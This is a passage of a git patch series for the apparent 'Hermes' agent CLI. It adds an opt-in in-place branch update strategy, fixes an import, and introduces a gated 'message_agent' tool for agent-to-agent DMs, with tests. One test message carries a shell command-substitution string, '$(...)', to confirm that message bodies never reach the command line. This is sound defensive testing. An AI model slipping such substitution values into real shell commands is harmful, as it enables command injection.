{"parked_branch_strategy": "update_in_place"}}, + ) + (repo_pair / "feature.txt").write_text("unmerged work\n") + _git(repo_pair, "add", "feature.txt") + _git(repo_pair, "commit", "-qm", "feature work") + _patch_update_flow(monkeypatch, repo_pair) + + class _StopFlow(Exception): + pass + + monkeypatch.setattr( + hermes_main, + "_abort_dependency_sync_if_self_locked", + lambda *a, **k: (_ for _ in ()).throw(_StopFlow()), + ) + args = SimpleNamespace( + branch=None, yes=False, force=False, force_venv=False, + switch_branch=False, + ) + + with pytest.raises(_StopFlow): + hermes_main.cmd_update(args) + + out = capsys.readouterr().out + assert "updating it in place" in out + assert "--switch-branch" not in out + assert ( + _git(repo_pair, "rev-parse", "--abbrev-ref", "HEAD").stdout.strip() + == "old-feature" + ) + + def test_update_auto_switches_clean_merged_parked_branch( repo_pair, monkeypatch, capsys ): From 70151dd5493ffdf99327f26906a88e1bb1bc4f1a Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 14:49:27 -0700 Subject: [PATCH 069/161] feat(update): updates.parked_branch_strategy gates the in-place merge; switch stays the default Adapts the in-place branch update from PR #89507 (@willfrombr) onto the switch-by-default behavior: the deterministic switch path remains the default so non-interactive updates (desktop, gateway, cron) never dead-end on a merge conflict, and deliberate custom-branch users opt in with updates.parked_branch_strategy: update_in_place. --switch-branch overrides the in-place strategy for one run (deep feature branches that must not accumulate update merge commits). Docs + config comments + tests cover all three routes. Co-authored-by: Willian Santos <285090322+willfrombr@users.noreply.github.com> --- .../willfrombr@Willians-MacBook-Pro.local | 1 + hermes_cli/config_defaults.py | 19 +++++++++++++++++++ hermes_cli/subcommands/update.py | 16 ++++++++-------- website/docs/getting-started/updating.md | 2 ++ 4 files changed, 30 insertions(+), 8 deletions(-) create mode 100644 contributors/emails/willfrombr@Willians-MacBook-Pro.local diff --git a/contributors/emails/willfrombr@Willians-MacBook-Pro.local b/contributors/emails/willfrombr@Willians-MacBook-Pro.local new file mode 100644 index 0000000000..13bffb7446 --- /dev/null +++ b/contributors/emails/willfrombr@Willians-MacBook-Pro.local @@ -0,0 +1 @@ +willfrombr diff --git a/hermes_cli/config_defaults.py b/hermes_cli/config_defaults.py index d47082eb12..2de9540307 100644 --- a/hermes_cli/config_defaults.py +++ b/hermes_cli/config_defaults.py @@ -3265,6 +3265,25 @@ DEFAULT_CONFIG = { # checkout stayed days behind main on a stale branch). Set false to # never auto-switch. "auto_switch_parked_branch": True, + # HOW a clean parked branch with unmerged commits is handled: + # "switch" (default) — switch to the update target; the commits + # stay on the branch (git checkout never + # discards committed work) and a loud notice + # names the branch + count. Deterministic — + # never conflicts — so desktop/gateway/cron + # updates always land on current code. + # "update_in_place" — for a deliberately maintained custom branch + # (local patches on top of main): merge + # origin/ INTO the branch instead. + # The checkout never moves and local commits + # survive; a conflict stops the update + # cleanly with nothing changed. A safety tag + # (pre-update-) is left before the + # merge. `hermes update --switch-branch` + # overrides back to the switch path for one + # run (e.g. a deep feature branch that must + # not accumulate update merge commits). + "parked_branch_strategy": "switch", # Refresh an already-installed cua-driver during `hermes update`. # The refresh is best-effort and macOS-only. Turn this off if the # upstream installer is not appropriate for the machine, for example diff --git a/hermes_cli/subcommands/update.py b/hermes_cli/subcommands/update.py index 71e28166dc..24bfffeb22 100644 --- a/hermes_cli/subcommands/update.py +++ b/hermes_cli/subcommands/update.py @@ -89,14 +89,14 @@ def build_update_parser(subparsers, *, cmd_update: Callable) -> None: action="store_true", default=False, help=( - "When the checkout sits on a branch carrying unmerged commits, " - "switch to the update target and update THERE instead of merging " - "the target into the branch in place. The branch is left exactly " - "as it was — no merge commit is written into its history. Use on " - "long-lived feature branches where an update-driven merge commit " - "would pollute the branch; the default in-place behaviour suits " - "branches that track the target with a small patch set. Still " - "refuses to touch a dirty tree." + "With updates.parked_branch_strategy: update_in_place configured, " + "override it for this run: switch to the update target and update " + "THERE instead of merging the target into the checked-out branch. " + "The branch is left exactly as it was — no merge commit is written " + "into its history. Use on long-lived feature branches where an " + "update-driven merge commit would pollute the branch. No effect " + "under the default strategy (switch), which already switches. " + "Still refuses to touch a dirty tree." ), ) update_parser.add_argument( diff --git a/website/docs/getting-started/updating.md b/website/docs/getting-started/updating.md index 35604ce5eb..5859174c7f 100644 --- a/website/docs/getting-started/updating.md +++ b/website/docs/getting-started/updating.md @@ -49,6 +49,8 @@ If the source checkout was left sitting on a feature branch (by tooling, a workt - **Branch fully merged** (every commit already contained in `origin/main` — `git cherry` reports nothing unmerged): the update says so — `Checkout was parked on '' (fully merged) — switched back to main` — and stays on `main` afterwards. - **Branch has unmerged commits** but the tree is clean: the update still switches to `main` so the update can proceed — this is what non-interactive callers (the desktop update button, gateway `/update`, cron) rely on, since they have no way to resolve a skip. Your commits are untouched: `git checkout` never discards committed work, and the update prints a loud notice naming the branch and commit count, plus the `git checkout ` command to pick the work back up later. +If you *deliberately* run a custom branch (local patches maintained on top of main), set `updates.parked_branch_strategy: update_in_place` in `config.yaml`. The update then merges `origin/main` **into** your branch instead of switching away from it — the checkout never moves, your commits survive, and the running code advances. Fast-forward when possible; on divergence a true merge behind a `pre-update-` safety tag, stopping cleanly (nothing changed) on conflict. `hermes update --switch-branch` overrides back to the switch path for one run — useful on a deep feature branch that must not accumulate update-driven merge commits. + When the parked branch has **uncommitted changes** (dirty tree), Hermes does **not** touch it. The code update is marked **SKIPPED** with a loud warning naming the branch, how far behind `origin/main` it is, and the exact commands to resolve — instead of pretending the update succeeded. The completion line always shows the actual branch and HEAD (`✓ Update complete! [main @ 30fcf9580]`) so drift is visible at a glance. Set `updates.auto_switch_parked_branch: false` in `config.yaml` to disable the auto-switch entirely (the skip warning still fires). ### Local changes on non-interactive updates From 04acfb9673c641f6c3f511bfb88394d8dcb62c9f Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 15:02:13 -0700 Subject: [PATCH 070/161] fix: remove function-level 'import time as _time' that shadowed the module import The in-function import made _time local to all of _cmd_update_impl, so the orphan-backend reap path (which runs earlier in the function) hit UnboundLocalError before the import line executed. The module-level 'import time as _time' at the top of update_cmd.py already covers the divergence-merge safety tag. --- hermes_cli/update_cmd.py | 2 -- 1 file changed, 2 deletions(-) diff --git a/hermes_cli/update_cmd.py b/hermes_cli/update_cmd.py index 3b5acaa514..021b7656fe 100644 --- a/hermes_cli/update_cmd.py +++ b/hermes_cli/update_cmd.py @@ -5895,8 +5895,6 @@ def _cmd_update_impl(args, gateway_mode: bool): or "" ).strip() if _cur_branch and _cur_branch != branch: - import time as _time - print( f" ⚠ Checkout is on custom branch '{_cur_branch}' — " f"merging origin/{branch} instead of resetting so local commits survive..." From e26d91dc11ea32f2f1af2c9778d424172f834431 Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Fri, 21 Aug 2026 13:38:45 -0700 Subject: [PATCH 071/161] =?UTF-8?q?feat(bot-mode):=20message=5Fagent=20too?= =?UTF-8?q?l=20=E2=80=94=20structured,=20Bot-Chat-only=20agent-to-agent=20?= =?UTF-8?q?DMs?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Bot Mode agents now DM teammates through a real tool instead of hand-assembled shell commands. message_agent(target, message) validates the target against the live roster, applies the sender's attribution prefix server-side, and delivers over the existing proven transports (hermes -p ... --query-file for local teammates, hermes peer dm for peer gateways) as a tracked background process with notify-on-complete — fire-and-forget, the reply wakes the sender on a later turn. Containment: the schema is injected per-turn ONLY into a bot's canonical 'Bot Chat' session on Bot-Mode-managed installs (same gate as the protocol section); it is never registered in the tool registry or any toolset, and dispatch re-gates on the session title so a forged call from any other session refuses. The gate is session-stable, so the tool list stays byte-identical across turns (prompt-cache safe). The protocol section is rewritten to teach the tool and now carries the teammate roster WITH ROLES (Bot Mode title + profile description), so bots know who does what before picking a recipient. Roles and a protocol version salt join the capability fingerprint: existing eternal Bot Chats adopt the v2 protocol + tool with one epoch refresh, and a rename/description edit refreshes the roster on the next message. --- agent/tool_executor.py | 25 ++ agent/turn_context.py | 13 + tests/hermes_cli/test_chat_query_file.py | 15 +- tests/tools/test_bot_mode_dm.py | 296 +++++++++++++++++ tests/tools/test_bot_mode_probe.py | 40 ++- tools/bot_mode_dm.py | 384 +++++++++++++++++++++++ tools/bot_mode_probe.py | 106 +++++-- website/docs/user-guide/bot-mode.md | 4 +- 8 files changed, 848 insertions(+), 35 deletions(-) create mode 100644 tests/tools/test_bot_mode_dm.py create mode 100644 tools/bot_mode_dm.py diff --git a/agent/tool_executor.py b/agent/tool_executor.py index e7bb9126db..3f0d64fbb1 100644 --- a/agent/tool_executor.py +++ b/agent/tool_executor.py @@ -2066,6 +2066,31 @@ def execute_tool_calls_sequential(agent, assistant_message, messages: list, effe tool_duration = time.time() - tool_start_time if agent._should_emit_quiet_tool_messages(): agent._vprint(f" {_get_cute_tool_message_impl('todo', function_args, tool_duration, result=function_result)}") + elif function_name == "message_agent": + # Bot Mode teammate DM (tools/bot_mode_dm.py) — injected, not + # registered: only a canonical Bot Chat session carries the + # schema, and the tool re-gates on the session title itself. + def _execute(next_args: dict) -> Any: + from tools.bot_mode_dm import message_agent_tool as _message_agent_tool + return _message_agent_tool( + target=next_args.get("target", ""), + message=next_args.get("message", ""), + task_id=effective_task_id, + agent=agent, + ) + function_result, function_args, middleware_trace, _execution_blocked, _execution_dispatched = _managed_values(_run_agent_tool_execution_middleware( + agent, + function_name=function_name, + function_args=function_args, + effective_task_id=effective_task_id, + tool_call_id=getattr(tool_call, "id", "") or "", + execute=_execute, + scope_block=_ts_scope_block, + display_index=i, + )) + tool_duration = time.time() - tool_start_time + if agent._should_emit_quiet_tool_messages(): + agent._vprint(f" {_get_cute_tool_message_impl('message_agent', function_args, tool_duration, result=function_result)}") elif function_name == "session_search": def _execute(next_args: dict) -> Any: session_db = agent._get_session_db_for_recall() diff --git a/agent/turn_context.py b/agent/turn_context.py index df8969a666..f9bc38f126 100644 --- a/agent/turn_context.py +++ b/agent/turn_context.py @@ -746,6 +746,19 @@ def build_turn_context( active_system_prompt = agent._cached_system_prompt + # Bot Mode DM tool — injected ONLY into a bot's canonical "Bot Chat" + # session on Bot-Mode-managed installs (same gate as the protocol + # section above). The gate is stable for a session's lifetime, so the + # tool list is byte-identical every turn: prompt-cache safe. Every + # other session (CLI, gateway chats, group-room member sessions, cron, + # subagents) fails the gate and never sees the schema. + try: + from tools.bot_mode_dm import ensure_message_agent_tool + + ensure_message_agent_tool(agent) + except Exception: + logger.debug("message_agent injection skipped", exc_info=True) + # Create the DB session row now that _cached_system_prompt is populated, so # the persisted snapshot is written non-NULL on the first turn (Issue # #45499). Idempotent: _ensure_db_session() no-ops once the row exists. diff --git a/tests/hermes_cli/test_chat_query_file.py b/tests/hermes_cli/test_chat_query_file.py index fa3bb116f9..4ce5f876e0 100644 --- a/tests/hermes_cli/test_chat_query_file.py +++ b/tests/hermes_cli/test_chat_query_file.py @@ -61,15 +61,26 @@ def test_query_and_query_file_mutually_exclusive(tmp_path): def test_bot_mode_protocol_never_inlines_message_into_shell(): - """The DM protocol must use --query-file / stdin, not -q "…" inlining.""" + """The DM transport must use --query-file / stdin, not -q "…" inlining. + + The transport moved from prompt-injected instructions (bot_mode_probe) + to the message_agent tool (bot_mode_dm) in Aug 2026 — the invariant now + holds on the tool's command builder, and the probe must no longer teach + any shellout at all. + """ sys.path.insert(0, str(REPO)) try: import importlib + dm = importlib.import_module("tools.bot_mode_dm") + src = Path(dm.__file__).read_text(encoding="utf-8") probe = importlib.import_module("tools.bot_mode_probe") - src = Path(probe.__file__).read_text(encoding="utf-8") + probe_src = Path(probe.__file__).read_text(encoding="utf-8") finally: sys.path.remove(str(REPO)) assert "--query-file" in src assert '-q "Message from' not in src assert 'dm / "Message from' not in src + # The protocol section teaches the tool, never a hand-rolled shellout. + assert "message_agent" in probe_src + assert "--query-file /tmp/dm.txt" not in probe_src diff --git a/tests/tools/test_bot_mode_dm.py b/tests/tools/test_bot_mode_dm.py new file mode 100644 index 0000000000..18da42cf83 --- /dev/null +++ b/tests/tools/test_bot_mode_dm.py @@ -0,0 +1,296 @@ +"""Tests for tools/bot_mode_dm.py — the Bot-Chat-only ``message_agent`` tool. + +The containment contract is the headline here: the tool must exist ONLY in a +canonical Bot Chat session on a Bot-Mode-managed install, and must refuse to +deliver from anywhere else even if a schema leaks. +""" + +import json +import textwrap +from pathlib import Path + +import pytest + +from tools import bot_mode_dm, bot_mode_probe + + +@pytest.fixture(autouse=True) +def _fresh_probe_cache(): + bot_mode_probe._reset_cache_for_tests() + yield + bot_mode_probe._reset_cache_for_tests() + + +def _managed_home(tmp_path, *, teammates=("researcher",), peers=()) -> Path: + home = tmp_path / ".hermes" + home.mkdir(exist_ok=True) + for name in teammates: + d = home / "profiles" / name + d.mkdir(parents=True, exist_ok=True) + (d / "profile.yaml").write_text( + textwrap.dedent( + """\ + description: teammate for tests + ui_meta: + hermes-bots: + shape: cloud + """ + ), + encoding="utf-8", + ) + if peers: + lines = ["bot_peers:"] + for peer in peers: + lines += [f" {peer}:", f" url: http://{peer}.lan:8377"] + (home / "config.yaml").write_text("\n".join(lines) + "\n", encoding="utf-8") + return home + + +class _FakeDB: + def __init__(self, home: Path, title: str): + self.db_path = str(home / "state.db") + self._title = title + + def get_session_title(self, _sid): + return self._title + + +class _FakeAgent: + def __init__(self, home: Path, title: str = "Bot Chat"): + self._session_db = _FakeDB(home, title) + self.session_id = "sess-1" + self._session_title_hint = None + self._bot_mode_protocol = True + self.tools: list = [] + self.valid_tool_names: set = set() + + +# ── injection gate (leak containment) ──────────────────────────────────────── + + +def test_injects_only_into_bot_chat_on_managed_install(tmp_path): + home = _managed_home(tmp_path) + agent = _FakeAgent(home, title="Bot Chat") + assert bot_mode_dm.ensure_message_agent_tool(agent) is True + names = [t["function"]["name"] for t in agent.tools] + assert names == [bot_mode_dm.MESSAGE_AGENT_TOOL_NAME] + assert bot_mode_dm.MESSAGE_AGENT_TOOL_NAME in agent.valid_tool_names + + # idempotent: second call adds nothing (byte-stable tool list per turn) + assert bot_mode_dm.ensure_message_agent_tool(agent) is True + assert len(agent.tools) == 1 + + +@pytest.mark.parametrize( + "title", + ["", "My research chat", "Group: room-abc123", "handoff-12ab34cd"], +) +def test_never_injects_outside_bot_chat(tmp_path, title): + """CLI sessions, ordinary chats, group-room member sessions: no tool.""" + home = _managed_home(tmp_path) + agent = _FakeAgent(home, title=title) + assert bot_mode_dm.ensure_message_agent_tool(agent) is False + assert agent.tools == [] + assert agent.valid_tool_names == set() + + +def test_never_injects_on_unmanaged_install(tmp_path): + """A 'Bot Chat'-titled session on a plain install stays tool-free.""" + home = tmp_path / ".hermes" + home.mkdir() + agent = _FakeAgent(home, title="Bot Chat") + assert bot_mode_dm.ensure_message_agent_tool(agent) is False + assert agent.tools == [] + + +def test_config_toggle_disables_injection(tmp_path): + home = _managed_home(tmp_path) + agent = _FakeAgent(home, title="Bot Chat") + agent._bot_mode_protocol = False + assert bot_mode_dm.ensure_message_agent_tool(agent) is False + assert agent.tools == [] + + +def test_schema_never_in_global_registry(): + """message_agent must not be registered/toolset-reachable anywhere.""" + from tools.registry import registry + + assert bot_mode_dm.MESSAGE_AGENT_TOOL_NAME not in getattr(registry, "_tools", {}) + import toolsets + + for names in toolsets.TOOLSETS.values(): + assert bot_mode_dm.MESSAGE_AGENT_TOOL_NAME not in names + + +# ── dispatch gate (defense in depth) ───────────────────────────────────────── + + +def test_tool_refuses_outside_bot_chat(tmp_path): + home = _managed_home(tmp_path) + agent = _FakeAgent(home, title="Ordinary chat") + result = json.loads( + bot_mode_dm.message_agent_tool(target="researcher", message="hi", agent=agent) + ) + assert "error" in result + assert "Bot Chat" in result["error"] + + +def test_tool_refuses_on_unmanaged_install(tmp_path): + home = tmp_path / ".hermes" + home.mkdir() + agent = _FakeAgent(home, title="Bot Chat") + result = json.loads( + bot_mode_dm.message_agent_tool(target="researcher", message="hi", agent=agent) + ) + assert "error" in result + + +# ── target validation ──────────────────────────────────────────────────────── + + +def test_unknown_target_lists_roster(tmp_path): + home = _managed_home(tmp_path, teammates=("researcher", "coder")) + agent = _FakeAgent(home, title="Bot Chat") + result = json.loads( + bot_mode_dm.message_agent_tool(target="nosuchbot", message="hi", agent=agent) + ) + assert "error" in result + assert set(result["teammates"]) == {"researcher", "coder"} + + +def test_cannot_message_self(tmp_path): + home = _managed_home(tmp_path) + agent = _FakeAgent(home, title="Bot Chat") # default profile + result = json.loads( + bot_mode_dm.message_agent_tool(target="hermes", message="hi", agent=agent) + ) + assert "error" in result + assert "yourself" in result["error"] + + +def test_empty_and_oversized_message_rejected(tmp_path): + home = _managed_home(tmp_path) + agent = _FakeAgent(home, title="Bot Chat") + assert "error" in json.loads( + bot_mode_dm.message_agent_tool(target="researcher", message=" ", agent=agent) + ) + big = "x" * (bot_mode_dm.MESSAGE_MAX_CHARS + 1) + assert "error" in json.loads( + bot_mode_dm.message_agent_tool(target="researcher", message=big, agent=agent) + ) + + +def test_unregistered_peer_rejected(tmp_path): + home = _managed_home(tmp_path, peers=("spark",)) + agent = _FakeAgent(home, title="Bot Chat") + result = json.loads( + bot_mode_dm.message_agent_tool(target="homelab/coder", message="hi", agent=agent) + ) + assert "error" in result + assert result["peers"] == ["spark"] + + +# ── delivery command shape ─────────────────────────────────────────────────── + + +def _capture_spawn(monkeypatch): + calls = [] + + def fake_terminal_tool(command, **kwargs): + calls.append({"command": command, **kwargs}) + return json.dumps({"output": "Background process started", "session_id": "proc_test1234"}) + + import tools.terminal_tool as terminal_tool_module + + monkeypatch.setattr(terminal_tool_module, "terminal_tool", fake_terminal_tool) + return calls + + +def test_local_delivery_command_and_ack(tmp_path, monkeypatch): + calls = _capture_spawn(monkeypatch) + home = _managed_home(tmp_path, teammates=("researcher",)) + agent = _FakeAgent(home, title="Bot Chat") + + result = json.loads( + bot_mode_dm.message_agent_tool( + target="@researcher", + message='status? give me the "final" numbers $(and this is not shell)', + agent=agent, + ) + ) + assert result["status"] == "sent" + assert result["to"] == "@researcher" + assert result["process_id"] == "proc_test1234" + assert "do NOT wait" in result["detail"] + + assert len(calls) == 1 + call = calls[0] + assert call["background"] is True + assert call["notify_on_complete"] is True + command = call["command"] + assert command.startswith("hermes -p researcher chat --in ~ -c \"Bot Chat\"") + assert "--query-file" in command + # message body rides the temp file, never the command line + assert "final" not in command + assert "$(" not in command + + # attribution prefix applied server-side; body verbatim inside the file + dm_file = command.rsplit(" ", 1)[-1].strip("'") + content = Path(dm_file).read_text(encoding="utf-8") + assert content.startswith("Message from 🤖 hermes (@hermes): ") + assert '$(and this is not shell)' in content + + +def test_peer_delivery_command(tmp_path, monkeypatch): + calls = _capture_spawn(monkeypatch) + home = _managed_home(tmp_path, peers=("spark",)) + agent = _FakeAgent(home, title="Bot Chat") + + result = json.loads( + bot_mode_dm.message_agent_tool(target="spark/researcher", message="ping", agent=agent) + ) + assert result["status"] == "sent" + assert "spark" in result["to"] + command = calls[0]["command"] + assert command.startswith("hermes peer dm spark/researcher < ") + + # bare peer name targets the peer's main agent + result2 = json.loads( + bot_mode_dm.message_agent_tool(target="spark", message="ping", agent=agent) + ) + assert result2["status"] == "sent" + assert calls[1]["command"].startswith("hermes peer dm spark < ") + + +def test_named_profile_sender_prefix(tmp_path, monkeypatch): + """A named-profile bot signs with its own handle, not @hermes.""" + calls = _capture_spawn(monkeypatch) + home = _managed_home(tmp_path, teammates=("researcher", "coder")) + profile_home = home / "profiles" / "coder" + agent = _FakeAgent(profile_home, title="Bot Chat") + + result = json.loads( + bot_mode_dm.message_agent_tool(target="researcher", message="hi", agent=agent) + ) + assert result["status"] == "sent" + dm_file = calls[0]["command"].rsplit(" ", 1)[-1].strip("'") + assert Path(dm_file).read_text(encoding="utf-8").startswith( + "Message from 🤖 coder (@coder): " + ) + + +def test_spawn_failure_reports_error(tmp_path, monkeypatch): + home = _managed_home(tmp_path) + agent = _FakeAgent(home, title="Bot Chat") + + import tools.terminal_tool as terminal_tool_module + + def boom(command, **kwargs): + raise RuntimeError("spawn failed") + + monkeypatch.setattr(terminal_tool_module, "terminal_tool", boom) + result = json.loads( + bot_mode_dm.message_agent_tool(target="researcher", message="hi", agent=agent) + ) + assert "error" in result + assert "could not be started" in result["error"] diff --git a/tests/tools/test_bot_mode_probe.py b/tests/tools/test_bot_mode_probe.py index b74b85c522..85f99a0867 100644 --- a/tests/tools/test_bot_mode_probe.py +++ b/tests/tools/test_bot_mode_probe.py @@ -51,8 +51,8 @@ def test_emits_for_default_when_any_profile_is_managed(tmp_path): # default's callable alias is @hermes, never @default assert "@hermes" in section assert "@default" not in section - assert "`researcher`" in section - assert "hermes profile list" in section + assert "@researcher" in section + assert "message_agent" in section def test_emits_for_named_profile_with_own_handle(tmp_path): @@ -62,9 +62,36 @@ def test_emits_for_named_profile_with_own_handle(tmp_path): section = bot_mode_probe.get_bot_mode_protocol_section(profile_dir) assert "@coder" in section - # teammate list excludes self, includes default - assert "`default`" in section - assert "`coder`" not in section.split("Teammates at session start:")[1] + # teammate roster excludes self, includes default (as @hermes) + roster_block = section.split("Your teammates")[1] + assert "`@hermes`" in roster_block + assert "`@coder`" not in roster_block + + +def test_roster_lines_carry_roles(tmp_path): + """Bots must know WHO to message: the roster carries title/description.""" + import textwrap as _tw + + home = tmp_path / ".hermes" + home.mkdir() + d = home / "profiles" / "researcher" + d.mkdir(parents=True) + (d / "profile.yaml").write_text( + _tw.dedent( + """\ + description: Deep research and literature review + ui_meta: + hermes-bots: + title: Research Buddy + """ + ), + encoding="utf-8", + ) + + section = bot_mode_probe.get_bot_mode_protocol_section(home) + assert "`@researcher`" in section + assert "Research Buddy" in section + assert "Deep research and literature review" in section def test_silent_when_soul_already_carries_protocol(tmp_path): @@ -233,7 +260,8 @@ def test_peer_paragraph_lists_registered_peers(tmp_path): ) section = bot_mode_probe.get_bot_mode_protocol_section(home) - assert "hermes peer dm" in section + assert "message_agent" in section + assert '"/"' in section assert "`homelab`" in section and "`spark`" in section assert "hermes peer list" in section diff --git a/tools/bot_mode_dm.py b/tools/bot_mode_dm.py new file mode 100644 index 0000000000..c286984c5f --- /dev/null +++ b/tools/bot_mode_dm.py @@ -0,0 +1,384 @@ +"""Bot Mode agent-to-agent DM tool — ``message_agent``. + +A structured, Bot-Chat-only tool that lets a Bot Mode agent message a +teammate agent (another Hermes profile on this install, or an agent on a +registered peer gateway) WITHOUT hand-assembling shell commands. + +Why this exists (Aug 2026): the Bot Mode teammate protocol taught agents to +DM each other via a prompt-injected ``hermes -p chat ...`` shellout. +That transport works, but the *invocation* was fragile — quoting traps +(#91339/#91304), temp-file choreography, dead-profile races — and the +Desktop's remote-mention path forwarded raw user text verbatim (#91397). +``message_agent`` replaces the invocation with a real tool call: the message +is a parameter, the target is validated against the live roster, the +attribution prefix is applied server-side, and the reply arrives through the +existing background-process notification path (fire-and-forget, never +blocks the sender's turn). + +Containment contract (MUST hold — reviewers check all three): +- The tool schema is injected ONLY into a bot's canonical "Bot Chat" + session on Bot-Mode-managed installs — the exact same gate as the + protocol section in ``tools/bot_mode_probe.py``. It is NOT registered in + the global tool registry, is NOT part of any toolset, and never appears + in CLI sessions, ordinary gateway chats, group-room member sessions + (titled "Group: …"), cron agents, or subagents. +- Dispatch is title-gated again at execution time (defense in depth): a + forged call from a session that shouldn't have the tool returns a + structured error instead of delivering. +- Everything here is additive. The legacy protocol transports + (``hermes -p`` / ``hermes peer dm``) keep working for older prompts. + +The transports themselves are unchanged and proven: +- local teammate → ``hermes -p chat --in ~ -c "Bot Chat" + --create-if-missing -Q --query-file `` (one turn, reply on stdout) +- peer teammate → ``hermes peer dm [/] < `` + +Both run through ``terminal_tool(background=True, notify_on_complete=True)`` +so the reply lands as a completion notification on the sender's NEXT turn — +the same wake shape every Bot Mode agent already knows. +""" + +from __future__ import annotations + +import json +import logging +import os +import re +import shlex +import tempfile +import time +from pathlib import Path +from typing import Any, Optional + +logger = logging.getLogger(__name__) + +MESSAGE_AGENT_TOOL_NAME = "message_agent" + +# Message body cap — generous for real work products, small enough that a +# runaway paste can't turn one DM into a context bomb on the recipient. +MESSAGE_MAX_CHARS = 16000 + +_PEER_TARGET_RE = re.compile(r"^([a-z0-9][a-z0-9_-]{0,63})/([a-zA-Z0-9][a-zA-Z0-9_-]{0,63})$") +_LOCAL_TARGET_RE = re.compile(r"^[a-zA-Z0-9][a-zA-Z0-9_-]{0,63}$") + + +def message_agent_tool_schema() -> dict: + """OpenAI-format schema for ``message_agent`` (injected, not registered).""" + return { + "type": "function", + "function": { + "name": MESSAGE_AGENT_TOOL_NAME, + "description": ( + "Send a message to ANOTHER agent (teammate) on this install, or to an " + "agent on a registered peer gateway. This is FIRE-AND-FORGET and " + "asynchronous, like texting: it validates the target against the live " + "roster, delivers your message into that agent's own Bot Chat with your " + "attribution automatically prefixed, and returns immediately with a " + "delivery acknowledgement. It does NOT return their reply and you must " + "not wait or poll for one — send it, finish your turn, and the reply " + "arrives later as a background-process completion notification that " + "wakes you. COMPOSE the message yourself: write what YOU want to say to " + "that agent (lead with the point; include the concrete ask or result). " + "Never paste the user's words verbatim — paraphrase the actionable " + "substance, and keep private 1:1 chat content private. Message one " + "clearly relevant teammate when it genuinely helps the user's goal; " + "don't fan out to several agents unless the user explicitly asked. " + "Use the teammate roster in your system prompt (names + roles) to pick " + "the right recipient; targets: a teammate name (e.g. 'researcher'), or " + "'/' for an agent on a registered peer gateway " + "(e.g. 'spark/researcher', or just '' for the peer's main agent)." + ), + "parameters": { + "type": "object", + "properties": { + "target": { + "type": "string", + "description": ( + "Who to message: a teammate profile name from your roster " + "('researcher', 'hermes' for the default agent), or " + "'' / '/' for a registered peer gateway." + ), + }, + "message": { + "type": "string", + "description": ( + "The message YOU composed for that agent (max " + f"{MESSAGE_MAX_CHARS} chars). Do not include the " + "'Message from …' prefix — it is added automatically." + ), + }, + }, + "required": ["target", "message"], + }, + }, + } + + +def ensure_message_agent_tool(agent: Any) -> bool: + """Inject the ``message_agent`` schema into a Bot Chat agent's tool list. + + Called once per turn from the conversation loop. Idempotent and + deterministic for the life of a session: the gate (canonical Bot Chat + title on a Bot-Mode-managed install) is stable from the session's first + turn, so the tool list is byte-identical across turns — prompt-cache + safe. Every non-Bot-Chat session fails the gate on every turn and never + sees the schema. Never raises. + """ + try: + if not getattr(agent, "_bot_mode_protocol", True): + return False + tools = getattr(agent, "tools", None) + if tools: + for tool in tools: + if ( + isinstance(tool, dict) + and tool.get("function", {}).get("name") == MESSAGE_AGENT_TOOL_NAME + ): + return True + from tools.bot_mode_probe import BOT_CHAT_TITLE, get_bot_mode_protocol_section + + if _session_title(agent) != BOT_CHAT_TITLE: + return False + if not get_bot_mode_protocol_section(_agent_home(agent)): + return False + if agent.tools is None: + agent.tools = [] + agent.tools.append(message_agent_tool_schema()) + valid = getattr(agent, "valid_tool_names", None) + if isinstance(valid, set): + valid.add(MESSAGE_AGENT_TOOL_NAME) + return True + except Exception: # pragma: no cover — must never break a turn + logger.debug("ensure_message_agent_tool failed", exc_info=True) + return False + + +# ── roster resolution ──────────────────────────────────────────────────────── + + +def _hermes_root(home: Path) -> Path: + if home.parent.name == "profiles": + return home.parent.parent + return home + + +def _self_profile_name(home: Path) -> str: + if home.parent.name == "profiles": + return home.name + return "default" + + +def _local_roster(root: Path) -> list[str]: + """Profile names on this install: default + every named profile.""" + names = ["default"] + try: + profiles = root / "profiles" + if profiles.is_dir(): + for child in sorted(profiles.iterdir()): + if child.is_dir(): + names.append(child.name) + except Exception: + pass + return names + + +def _peers(root: Path) -> list[str]: + try: + from tools.bot_mode_probe import _peers as _probe_peers + + return _probe_peers(root) + except Exception: + return [] + + +def _handle(name: str) -> str: + return "hermes" if name == "default" else name + + +def _resolve_local_name(target: str, roster: list[str]) -> Optional[str]: + """Map a target handle to a profile name ('hermes' → 'default').""" + want = target.strip() + if not want: + return None + if want.lower() == "hermes": + return "default" if "default" in roster else None + for name in roster: + if name.lower() == want.lower(): + return name + return None + + +# ── the tool ───────────────────────────────────────────────────────────────── + + +def _err(message: str, *, roster: list[str] | None = None, peers: list[str] | None = None) -> str: + payload: dict[str, Any] = {"error": message} + if roster is not None: + payload["teammates"] = roster + if peers is not None: + payload["peers"] = peers + return json.dumps(payload) + + +def message_agent_tool( + target: str = "", + message: str = "", + task_id: Optional[str] = None, + agent: Any = None, +) -> str: + """Deliver ``message`` to ``target``'s Bot Chat. Returns a JSON ack/error. + + ``agent`` is the calling AIAgent (threaded by the executor) — used for + the Bot Chat gate, the sender identity, and the session key so the + spawned transport is tracked against the right session. + """ + # ── defense-in-depth gate: only a canonical Bot Chat may deliver ── + home = _agent_home(agent) + try: + from tools.bot_mode_probe import BOT_CHAT_TITLE, get_bot_mode_protocol_section + + title = _session_title(agent) + if title != BOT_CHAT_TITLE: + return _err( + "message_agent is only available in a Bot Mode 'Bot Chat' session. " + "This session is not one; do not retry." + ) + if not get_bot_mode_protocol_section(home): + return _err( + "This install is not Bot-Mode-managed (no bot roster); " + "message_agent is unavailable. Do not retry." + ) + except Exception as exc: # pragma: no cover — defensive + return _err(f"Bot Mode gate check failed: {exc}") + + root = _hermes_root(Path(home)) + me = _self_profile_name(Path(home)) + roster = _local_roster(root) + peers = _peers(root) + teammates = [_handle(n) for n in roster if n != me] + + body = str(message or "").strip() + if not body: + return _err("message is required — compose what you want to say to that agent.") + if len(body) > MESSAGE_MAX_CHARS: + return _err( + f"message too long ({len(body)} chars > {MESSAGE_MAX_CHARS}). " + "Send the essentials; share large content as a file path instead." + ) + + raw_target = str(target or 